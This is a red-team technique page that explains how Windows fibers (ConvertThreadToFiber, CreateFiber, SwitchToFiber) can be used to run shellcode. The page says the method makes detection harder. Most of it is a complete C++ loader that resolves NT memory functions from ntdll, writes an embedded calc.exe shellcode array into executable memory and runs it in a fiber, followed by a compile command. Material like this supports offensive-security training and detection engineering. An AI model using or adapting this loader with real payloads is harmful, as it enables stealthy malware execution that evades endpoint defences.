Infiltr8ForumGitHub

Fibers Shellcode Execution

Theory

This technique executes shellcode by leveraging Windows Fibers for indirect execution flow control. Unlike traditional shellcode execution techniques that rely on CreateThread or direct function pointers, this method utilizes ConvertThreadToFiber, CreateFiber, and SwitchToFiber to execute shellcode in a fiber's context. This allows execution within an existing thread, making detection more challenging.

Windows fibers are manually scheduled execution units that run within the context of a thread. Unlike threads, fibers do not have their own kernel-managed execution state but instead share the thread's stack and register state. Fibers are useful in scenarios where a program needs finer control over execution switching.

Windows Fibers Overview

A fiber is a lightweight execution unit that must be explicitly scheduled by the application. The primary difference between a thread and a fiber is that threads are preemptively scheduled by the OS, whereas fibers must yield execution manually. The Windows API provides the following key functions for working with fibers:

  • ConvertThreadToFiber(): Converts the calling thread into a fiber, enabling fiber-based execution.

  • CreateFiber(): Creates a new fiber with a specified stack size and entry function.

  • SwitchToFiber(): Switches execution to the specified fiber.

  • DeleteFiber(): Frees resources associated with a fiber when execution completes.

Since fibers execute within the thread that schedules them, all operations performed by a fiber appear as if they were performed by the thread itself. This includes memory access, thread-local storage (TLS), and API calls.

Execution Flow

  1. Allocate Memory for Shellcode:

    • Memory is allocated within the process using NtAllocateVirtualMemory.

    • Shellcode is written using NtWriteVirtualMemory.

    • Memory protection is changed to executable using NtProtectVirtualMemory.

  2. Convert Thread to Fiber:

    • The calling thread is converted into a fiber using ConvertThreadToFiber(). This enables fiber switching within the thread.

  3. Create a Fiber for Shellcode Execution:

    • CreateFiber() is used to create a new fiber pointing to the allocated shellcode.

  4. Switch to Shellcode Fiber:

    • SwitchToFiber() is called to transfer execution to the shellcode fiber.

  5. Return Execution and Cleanup:

    • Once the shellcode executes, execution returns to the main fiber.

    • The fiber is deleted using DeleteFiber().

    • The thread is reverted back to its original state.

Practice

We maye use the following C++ code to execute the shellcode using fibers:

FiberExec.cpp
#include <iostream>
#include <windows.h>
#include <psapi.h>
#include <tlhelp32.h>
#include <stdlib.h>
#include <tchar.h>

// Add these typedefs and function declarations for the NT functions
typedef NTSTATUS (NTAPI *pNtAllocateVirtualMemory)(
    HANDLE ProcessHandle,
    PVOID *BaseAddress,
    ULONG_PTR ZeroBits,
    PSIZE_T RegionSize,
    ULONG AllocationType,
    ULONG Protect
);

typedef NTSTATUS (NTAPI *pNtWriteVirtualMemory)(
    HANDLE ProcessHandle,
    PVOID BaseAddress,
    PVOID Buffer,
    SIZE_T NumberOfBytesToWrite,
    PSIZE_T NumberOfBytesWritten
);

typedef NTSTATUS (NTAPI *pNtProtectVirtualMemory)(
    HANDLE ProcessHandle,
    PVOID *BaseAddress,
    PSIZE_T RegionSize,
    ULONG NewProtect,
    PULONG OldProtect
);

// Define NTSTATUS if not already defined
#ifndef NTSTATUS
typedef LONG NTSTATUS;
#endif


DWORD WINAPI esc_main(LPVOID lpParameter)
{
    DWORD dwSize;
    // calc.exe shellcode
    unsigned char decoded[] = {0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31,0x8b,0x6f,0x87,0xff,0xd5,0xbb,0xe0,0x1d,0x2a,0x0a,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x63,0x61,0x6c,0x63,0x2e,0x65,0x78,0x65,0x00};
    SIZE_T length = sizeof(decoded);


    // Load NT functions dynamically
    HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
    if (!hNtdll) {
        std::cerr << "Failed to get handle to ntdll.dll" << std::endl;
    }
 
    pNtAllocateVirtualMemory NtAllocateVirtualMemory = (pNtAllocateVirtualMemory)GetProcAddress(hNtdll, "NtAllocateVirtualMemory");
    pNtWriteVirtualMemory NtWriteVirtualMemory = (pNtWriteVirtualMemory)GetProcAddress(hNtdll, "NtWriteVirtualMemory");
    pNtProtectVirtualMemory NtProtectVirtualMemory = (pNtProtectVirtualMemory)GetProcAddress(hNtdll, "NtProtectVirtualMemory");
    
    if (!NtAllocateVirtualMemory || !NtWriteVirtualMemory || !NtProtectVirtualMemory) {
        std::cerr << "Failed to get addresses of NT functions" << std::endl;
    }

    // Prepare variables
    HANDLE hProc = GetCurrentProcess();
    PVOID base_addr = NULL;
    SIZE_T pnew = length;
    SIZE_T bytesWritten = 0;
    DWORD oldProtect = 0;
    NTSTATUS status;

    // Allocate memory for shellcode
    status = NtAllocateVirtualMemory(hProc, &base_addr, 0, &pnew, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (status != 0) {
        std::cerr << "NtAllocateVirtualMemory failed with status: " << std::hex << status << std::endl;
    }

    // Write shellcode to allocated memory
    status = NtWriteVirtualMemory(hProc, base_addr, decoded, pnew, &bytesWritten);
    if (status != 0) {
        std::cerr << "NtWriteVirtualMemory failed with status: " << std::hex << status << std::endl;
    }

    // Change memory protection to executable
    status = NtProtectVirtualMemory(hProc, &base_addr, (PSIZE_T)&pnew, PAGE_EXECUTE_READ, &oldProtect);
    if (status != 0) {
        std::cerr << "NtProtectVirtualMemory failed with status: " << std::hex << status << std::endl;
    }

    std::cout << "Executing shellcode using Fiber-based execution..." << std::endl;

    // Convert current thread to fiber
    PVOID MainFiber = ConvertThreadToFiber(NULL);
    if (!MainFiber) {
        std::cerr << "ConvertThreadToFiber failed with error: " << GetLastError() << std::endl;
    }

    // Create fiber pointing to shellcode
    PVOID ShellcodeFiber = CreateFiber(0, (LPFIBER_START_ROUTINE)base_addr, NULL);
    if (!ShellcodeFiber) {
        std::cerr << "CreateFiber failed with error: " << GetLastError() << std::endl;
        ConvertFiberToThread();
    }

    // Switch to shellcode fiber
    SwitchToFiber(ShellcodeFiber);

    // Execution returns here after shellcode completes
    DeleteFiber(ShellcodeFiber);
    ConvertFiberToThread();

    std::cout << "Execution completed" << std::endl;
    return 0;
}

int main()
{
    esc_main(NULL);
    return 0;
}

We can compile it from linux using following command

x86_64-w64-mingw32-g++ FiberExec.cpp -o FiberExec.exe -std=c++20 -static

Resources

LogoShellcode Execution through Fibers | Red Team Notes
LogoFibers - Win32 appsMicrosoftLearn

Last updated

Was this helpful?